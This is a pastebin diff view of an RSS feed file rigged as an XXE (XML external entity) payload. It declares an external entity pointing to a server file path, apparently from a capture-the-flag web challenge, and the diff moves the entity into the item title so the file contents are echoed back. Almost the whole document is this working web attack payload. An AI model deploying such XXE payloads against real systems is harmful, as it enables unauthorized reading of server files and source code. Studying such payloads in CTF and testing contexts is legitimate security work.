View difference between Paste ID: JmDpUmXq and 3ZRLa7G6
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE request [
3
	<!ENTITY include SYSTEM "/challenge/web-serveur/ch29/index.php">
4
]>
5
<rss version="2.0">
6
<channel>
7
  <title>Ajax and XUL</title>
8
  <link>https://www.xul.fr/en/</link>
9
  <request>&include;</request>
10
  <image>
11
      <url>https://www.xul.fr/xul-icon.gif</url>
12
      <link>https://www.xul.fr/en/index.php</link>
13
  </image>
14
  <item>
15-
      <title>News  of today</title>
15+
      <title>News  of today (&include;)</title>
16
      <link>https://www.xul.fr/en-xml-rss.html</link>
17
      <description>All you need to know about RSS</description>
18
  </item>
19
</channel>
20
</rss>